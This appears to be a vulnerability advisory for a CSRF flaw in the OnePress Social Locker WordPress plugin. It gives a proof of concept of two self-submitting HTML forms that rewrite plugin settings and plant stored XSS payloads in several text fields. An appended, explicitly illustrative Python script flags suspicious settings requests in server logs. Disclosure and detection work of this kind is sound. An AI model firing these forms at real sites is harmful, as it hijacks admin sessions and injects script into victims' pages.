WordPress Plugin Vulnerabilities
OnePress Social Locker <= 5.6.2 - Arbitrary Settings Update via CSRF
Description
The plugin has no CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=terms" method="POST">
  <input type="text" name="terms_enabled_is_active" value="1">
  <input type="text" name="opanda_terms_enabled" value="1">
  <input type="text" name="privacy_enabled_is_active" value="1">
  <input type="text" name="opanda_privacy_enabled" value="1">
  <input type="text" name="terms_use_pages_is_active" value="1">
  <input type="text" name="terms_of_use_text_is_active" value="1">
  <textarea name="opanda_terms_of_use_text"><img src=x onerror=alert(1)></textarea>
  <input type="text" name="privacy_policy_text_is_active" value="1">
  <textarea name="opanda_privacy_policy_text"><img src=x onerror=alert(1)></textarea>
  <input type="text" name="terms_of_use_page_is_active" value="1">
  <input type="text" name="opanda_terms_of_use_page" value="80">
  <input type="text" name="privacy_policy_page_is_active" value="1">
  <input type="text" name="opanda_privacy_policy_page" value="80">
  <input type="text" name="save-action" value="Save Changes">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=lock" method="POST">
  <input type="text" name="debug_is_active" value="1">
  <input type="text" name="passcode_is_active" value="1">
  <input type="text" name="opanda_passcode" value="1234">
  <input type="text" name="permanent_passcode_is_active" value="1">
  <input type="text" name="interrelation_is_active" value="1">
  <input type="text" name="in_app_browsers_is_active" value="1">
  <input type="text" name="opanda_in_app_browsers" value="visible_with_warning">
  <input type="text" name="in_app_browsers_warning_is_active" value="1">
  <input type="text" name="opanda_in_app_browsers_warning" value="You are viewing this page in the {browser}. The locker may work incorrectly in this browser. 
Please open this page in a standard browser.">
  <input type="text" name="adblock_is_active" value="1">
  <input type="text" name="opanda_adblock" value="show_error">
  <input type="text" name="adblock_error_is_active" value="1">
  <textarea name="opanda_adblock_error"><img src=x onerror=alert(1)></textarea>
  <input type="text" name="rss_is_active" value="1">
  <input type="text" name="actual_urls_is_active" value="1">
  <input type="text" name="session_duration_is_active" value="1">
  <input type="text" name="opanda_session_duration" value="900">
  <input type="text" name="session_freezing_is_active" value="1">
  <input type="text" name="normalize_markup_is_active" value="1">
  <input type="text" name="dynamic_theme_is_active" value="1">
  <input type="text" name="managed_hook_is_active" value="1">
  <input type="text" name="opanda_managed_hook" value="">
  <input type="text" name="alt_overlap_mode_is_active" value="1">
  <input type="text" name="opanda_alt_overlap_mode" value="transparence">
  <input type="text" name="content_visibility_is_active" value="1">
  <input type="text" name="opanda_content_visibility" value="auto">
  <input type="text" name="tumbler_is_active" value="1">
  <input type="text" name="timeout_is_active" value="1">
  <input type="text" name="opanda_timeout" value="20000">
  <input type="text" name="save-action" value="Save Changes">
</form>
<script>
  document.getElementById("test").submit();
</script>
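A log check for the request pattern above, added here as an example and not part of the original advisory or the plugin: it flags POSTs to the settings page whose Referer is missing or names another host. It assumes the Apache/nginx "combined" log format and the host example.com; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" log format; SITE_HOST is the WordPress host.
SITE_HOST = "example.com"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')

def settings_screen(method, target):
    """Return the opanda_screen value for a POST to the settings page, else None."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if (method == "POST" and url.path.endswith("/wp-admin/edit.php")
            and query.get("post_type") == ["opanda-item"]
            and query.get("page") == ["settings-bizpanda"]):
        return query.get("opanda_screen", ["?"])[0]
    return None

def suspicious_settings_posts(lines, site_host=SITE_HOST):
    """Flag settings POSTs whose Referer is missing or names another host."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        screen = settings_screen(m["method"], m["target"]) if m else None
        if screen is None:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host == site_host:
            continue  # same-origin save from the admin screen itself
        reason = f"cross-site referer {ref_host}" if ref_host else "no referer"
        findings.append((m["ts"], m["ip"], screen, reason))
    return findings

# Constructed sample lines (not real traffic); 203.0.113.7 is a documentation address.
_T = '203.0.113.7 - - [18/May/2022:10:0{}:00 +0000] "{} /wp-admin/edit.php?{} HTTP/1.1" 302 0 "{}" "Mozilla/5.0"'
_Q = "post_type=opanda-item&page=settings-bizpanda&opanda_screen="
SAMPLE_LOG = [
    _T.format(1, "POST", _Q + "terms", "https://example.com/wp-admin/edit.php?" + _Q + "terms"),
    _T.format(2, "POST", _Q + "lock", "https://other-site.test/page.html"),
    _T.format(3, "POST", _Q + "terms", "-"),
    _T.format(4, "GET", _Q + "lock", "https://other-site.test/page.html"),
    _T.format(5, "POST", "post_type=post", "https://other-site.test/page.html"),
]

if __name__ == "__main__":
    for finding in suspicious_settings_posts(SAMPLE_LOG):
        print(finding)
```

A missing Referer is a lead rather than proof, since browsers and referrer policies can suppress the header on legitimate requests.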
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18
Added
2022-05-18
Last Updated
2023-02-10